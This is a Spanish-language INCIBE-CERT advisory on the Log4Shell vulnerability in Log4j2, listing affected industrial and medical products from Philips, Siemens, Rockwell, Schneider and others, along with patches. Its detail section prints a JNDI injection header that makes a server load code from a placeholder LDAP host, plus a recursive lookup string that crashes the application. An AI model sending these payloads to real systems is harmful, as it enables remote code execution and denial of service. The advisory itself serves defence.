Instituto Nacional de ciberseguridad. Sección Incibe
Instituto Nacional de Ciberseguridad. Sección INCIBE-CERT

[Actualización 23/12/2021] Vulnerabilidad Log4Shell afecta a Sistemas de Control Industrial

Fecha de publicación 14/12/2021
Importancia
5 - Crítica
Recursos Afectados

La vulnerabilidad conocida como Log4Shell, detectada en la librería Log4j2 mantenida por Apache Software Foundation, desde la versión 2.0-beta9 hasta la versión 2.14.1, y descrita en nuestro aviso técnico, también ha afectado a fabricantes de Sistemas de Control Industrial.

Entre los fabricantes SCI que integran esta librería y han informado de la vulnerabilidad en sus productos están:

  • Philips:
    • IntelliSpace Precision Medicine (productos sólo de software con sistemas operativos propiedad del cliente),
    • RIS Clinic,
    • IntelliBridge Enterprise (B.13-B.15) (productos sólo de software con sistemas operativos propiedad del cliente),
    • VuePACS,
    • ISPACS (el entorno de hosting de Philips está evaluando la solución proporcionada por VMware y está en proceso de implementación para los clientes de servicios gestionados),
    • [Actualización 22/12/2021] HealthSuite Marketplace (1.2) (el entorno hosting de Philips ha desplegado un parche),
    • IntelliSite Pathology Solution 5.1 (L1),
    • Pathology De-identifier 1.0 (L1),
    • Performance Bridge (3.0) (productos sólo de software con sistemas operativos propiedad del cliente. Para las soluciones de productos en los que el servidor fue proporcionado por Philips, será responsabilidad de Philips validar y proporcionar parches),
    • Pinnacle (18.x),
    • Protocol Applications (1.1) (productos sólo de software con sistemas operativos propiedad del cliente. Para las soluciones de productos en los que el servidor fue proporcionado por Philips, será responsabilidad de Philips validar y proporcionar parches),
    • Scanner Protocol Manager (1.1) (productos sólo de software con sistemas operativos propiedad del cliente. Para las soluciones de productos en los que el servidor fue proporcionado por Philips, será responsabilidad de Philips validar y proporcionar parches),
    • Tasy EMR (productos sólo de software con sistemas operativos propiedad del cliente),
    • Universal Data Manager (UDM).
    • [Actualización 29/03/2022] IntelliVue XDS, productos software con sistemas operativos propiedad del cliente. En el caso de las soluciones de productos en las que se ha proporcionado el servidor, es responsabilidad del cliente validar e implantar los parches.
  • Siemens:
    • E-Car OC Cloud Application, versiones anteriores a 2021-12-13;
    • EnergyIP Prepay, versiones 3.7 y 3.8;
    • todas las versiones de:
      • Industrial Edge Management App (IEM-App);
      • Industrial Edge Management OS (IEM-OS);
      • Industrial Edge Management Hub;
      • LOGO! Soft Comfort;
      • Mendix Applications;
      • Siveillance Control Pro;
      • Siveillance Vantage.
    • Mindsphere Cloud Application, versiones anteriores a 2021-12-11;
    • Operation Scheduler, versión 1.1.3 y superiores;
    • SIGUARD DSA, versiones 4.2, 4.3 y 4.4;
    • SIMATIC WinCC 7.4, versiones anteriores a 7.4 SP1;
    • Siveillance Command, versión 4.16.2.1 y superiores.
    • [Actualización 15/12/2021] Nuevos productos afectados:
      • Desigo CC Info Center, versiones V5.0 y V5.1;
      • Desigo CC Advanced Reporting, versiones V4.0, V4.1, V4.2, V5.0 y V5.1;
      • Comos Desktop App, todas las versiones;
      • Capital, versión 2019.1 SP1912 y superiores, solo si la funcionalidad Teamcenter integration está activada.
    • [Actualización 16/12/2021] puede consultar la lista completa de productos afectados en su página web;
    • [Actualización 17/12/2021] se ha publicado un nuevo producto afectado en su página web;
    • [Actualización 21/12/2021] TraceAlertServerPLUS, todas las versiones.
    • [Actualización 22/12/2021] Distintos modelos de Sensformer Platform, en versiones anteriores a 2.7.0.
  • Rockwell Automation:
    • Plex (A Rockwell Automation Company) Industrial IoT;
    • Fiix (A Rockwell Automation Company) CMMS core V5.
    • [Actualización 16/12/2021] puede consultar la lista completa de productos afectados en su página web;
  • HMS
    • Ewon Talk2M;
    • [Actualización 21/12/2021] eCatcher Windows.

[Actualización 15/12/2021] Nuevos fabricantes afectados:

  • Wibu-Systems:
    • CodeMeter Keyring for TIA Portal, versiones anteriores a la 1.30 (solo afecta a Password Manager);
    • CodeMeter Cloud Lite, versiones anteriores a la 2.2.
  • Johnson Controls:
    • se está analizando el impacto de esta vulnerabilidad en sus productos.
    • se recomienda revisar las guías hardening y deployment de productos para garantizar que se han desplegado de acuerdo con los requisitos de diseño y funcionamiento del producto.
    • [Actualización 21/12/2021] exacq Enterprise Manager, versión 21.12 y anteriores.
    • [Actualización 22/12/2021] OpenBlue Bridge y RFID Overhead360° Backend.
  • Wind River:
    • Wind River Studio Analytics.

[Actualización 16/12/2021] Nuevos fabricantes afectados:

  • Schneider Electric, puede consultar la lista de productos afectados en su página web;
  • ABB, puede consultar la lista de productos afectados en su página web. Algunos de sus productos se ven afectados por la vulnerabilidad CVE-2021-4104;
  • B&R, puede consultar la lista de productos afectados en su página web. Algunos de sus productos se ven afectados por la vulnerabilidad CVE-2021-4104;
  • Phoenix Contact, puede consultar la lista de productos afectados en su página web;
  • HMS, puede consultar la lista de productos afectados en su página web.

[Actualización 17/12/2021] Nuevos fabricantes afectados:

  • General Electric, puede consultar la lista de productos afectados en su página web;
  • Philips, puede consultar la lista de productos afectados en su página web.
  • [Actualización 22/12/2021] Bosch, puede consultar la lista de productos afectados en sus páginas web BOSCH-SA-572602 [Actualización 23/12/2021] y BOSCH-SA-993110-BT.

Además, cabe destacar la importancia de analizar y revisar la afectación de otros productos y servicios de ámbito interno.

[Actualización 20/12/2021] Se ha detectado una vulnerabilidad de denegación de servicio (DoS), de severidad alta, que afecta a las versiones 2.0-alpha1 hasta 2.16, concretamente al archivo log4j-core JAR, y que lleva asociada el identificador CVE-2021-45105.

[Actualización 23/12/2021] La vulnerabilidad CVE-2021-45105 afecta a las versiones 2.0-beta9 hasta 2.16.0 excluyendo 2.12.3. La vulnerabilidad CVE-2021-45046 afecta a las versiones 2.0-beta9 hasta 2.15.0 excluyendo 2.12.2.

Descripción

Chen Zhaojun, investigador de Alibaba Cloud Security Team, ha descubierto una vulnerabilidad 0day crítica, que se ha denominado Log4Shell, que podría ser explotada por un atacante remoto no autenticado para ejecutar código arbitrario (RCE), y que varios fabricantes de SCI han detectado en algunos de sus productos.

Solución
  • [Actualización 15/12/2021] La versión 2.15.0 no soluciona completamente la vulnerabilidad ya que estaba incompleta en determinadas configuraciones, lo que podría permitir a un atacante la denegación del servicio. La versión Log4j 2.16.0 soluciona este problema eliminando el soporte para los patrones de búsqueda de mensajes y desactivando la funcionalidad JNDI por defecto. Como medidas de mitigación, aplicar las que aparecen listadas en el apartado Solución de nuestro aviso técnico.
  • Para los productos de Siemens, actualizar a las versiones indicadas en el apartada AFFECTED PRODUCTS AND SOLUTION de [Actualización 22/12/2021] sus avisos SSA-661247 y SSA-479842.
  • Para los productos de Rockwell Automation:
    • Plex Industrial IoT: no es necesario que el usuario actúe, ya que el producto ya tiene aplicada la mitigación y ya no está afectado. Además, el 13/12/21 se publicará un parche para actualizar Log4j2 a la versión 2.15.
    • Fiix CMMS core V5: no es necesaria ninguna acción por parte del usuario, ya que el producto se ha actualizado a la versión 2.15 de Log4j2.
  • HMS Ewon ha aplicado los parches necesarios en su infraestructura cloud Talk2M. [Actualización 21/12/2021] Actualizar eCatcher Windows a la versión 6.7.7.
  • [Actualización 15/12/2021] Soluciones para los nuevos productos afectados:
    • Wibu-Systems si en los productos afectados se está utilizando Wibu-Systems’ hosting service (WOPS), no es necesario realizar ninguna acción. En caso contrario, actualizar log4j a la versión 2.16.0.
    • Johnson Controls está analizando el impacto de esta vulnerabilidad, publicarán cualquier parche recomendado o actualización de productos en su página web de seguridad de productos. [Actualización 21/12/2021] Actualizar exacq Enterprise Manager a la versión 21.12.1 o aplicar los pasos de mitigación manual.
    • Wind River Studio Analytics contiene una versión vulnerable de Log4j, están trabajando para desarrollar, testear y lanzar un parche lo antes posible.
  • [Actualización 16/12/2021] Soluciones para los nuevos productos afectados:
    • Para los productos Schneider Electric, actualizar a las versiones indicadas en el apartada Final Remediation/Mitigation de su aviso;
    • Para los productos ABB, actualizar a las versiones indicadas en el apartada General security recommendations de su aviso;
    • Para los productos B&R, actualizar a las versiones indicadas en el apartada Supporting information and guidelines de su aviso;
    • Para los productos Phoenix Contact, actualizar a las versiones indicadas en el apartada General recommendation de su aviso;
    • Para los productos HMS, actualizar a las versiones indicadas en el apartada HMS Recommendations de su aviso.
  • [Actualización 20/12/2021] Para corregir la vulnerabilidad de DoS identificada con CVE-2021-45105, los usuarios de Java 8 (o posteriores) deben actualizar Log4j a la versión 2.17.0. Adicionalmente, se pueden adoptar unas medidas de mitigación en la configuración.
  • [Actualización 22/12/2021] Para los productos Bosch afectados, actualizar a la última versión de IoT Gateway y aplicar las medidas de mitigación descritas en su aviso. [Actualización 23/12/2021] Actualizar el firmware de PRA-APAS a la versión 1.0.32.
  • [Actualización 23/12/2021] CISA, FBI, NSA, ACSC, CCCS, CERT NZ, NZ NCSC y NCSC-UK han publicado un aviso conjunto de ciberseguridad, en forma de alerta AA21-356A, para proporcionar una guía de mitigación de las vulnerabilidades en la librería de software Log4j de Apache.
  • [Actualización 23/12/2021] Para solucionar CVE-2021-45105, actualizar a Log4j 2.3.1 (para Java 6), 2.12.3 (para Java 7) o 2.17.0 (para Java 8 y posteriores). Para solucionar CVE-2021-45046, actualizar a Log4j 2.3.1 (para Java 6), 2.12.3 (para Java 7) o 2.17.0 (para Java 8 y posteriores).
Detalle

La vulnerabilidad se origina de la forma en que los mensajes de registro son gestionados por el procesador Log4j. Si un atacante envía un mensaje especialmente diseñado:

User-Agent: ${jndi:ldap://<host>:<port>/<path>}

Podría resultar en la carga de una clase de código externo o la búsqueda de mensajes y la ejecución de ese código, lo que llevaría a una RCE. Se ha asignado el identificador CVE-2021-44228 para esta vulnerabilidad.

Debido a que algunas funciones de Apache Log4j realizan análisis recursivos, los atacantes podrían diseñar peticiones maliciosas para desencadenar vulnerabilidades de ejecución remota de código.

IMPORTANTE: esta vulnerabilidad podría estar explotándose de manera activa.

[Actualización 20/12/2021] Si se intenta una sustitución de cadena en la cadena que aparece a continuación, se desencadenará una recursión infinita, y la aplicación se bloqueará:

${${::-${::-$${::-j}}}}

Encuesta valoración

Listado de referencias